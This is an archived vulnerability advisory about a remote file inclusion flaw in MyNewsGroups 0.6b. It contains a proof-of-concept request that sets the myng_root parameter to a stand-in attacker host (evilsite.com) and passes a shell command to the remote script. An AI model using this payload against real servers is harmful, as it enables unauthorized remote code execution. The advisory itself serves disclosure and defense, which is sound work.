TUCoPS :: Web :: Apps :: b06-3959.htm

MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability
MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability
MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability



+--------------------------------------------------------------------=0D
+=0D
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion=0D
+=0D
+--------------------------------------------------------------------=0D
+=0D
+ Affected Software .: MyNewsGroups :) v. 0.6b=0D
+ Venedor ...........: http://mynewsgroups.sourceforge.net=0D 
+ Class .............: Remote File Inclusion=0D
+ Risk ..............: high (Remote File Execution)=0D
+ Found by ..........: Philipp Niedziela=0D
+ Original advisory .: http://www.bb-pcsecurity.de/=0D 
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de=0D
+=0D
+--------------------------------------------------------------------=0D
+=0D
+ Code /lib/tree/layersmenue.inc.php:=0D
+=0D
+ .....=0D
+ http://evilsite.com/pear/PEAR.php/index.html=0D 
+=0D
+=0D
http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://evilsite.com/P=0D 
EAR.php/&cmd=ls=0D
+=0D
+--------------------------------------------------------------------=0D
+=0D
+ Greets:=0D
+ Krini&Lenni=0D
+=0D
+-------------------------[ E O F ]----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH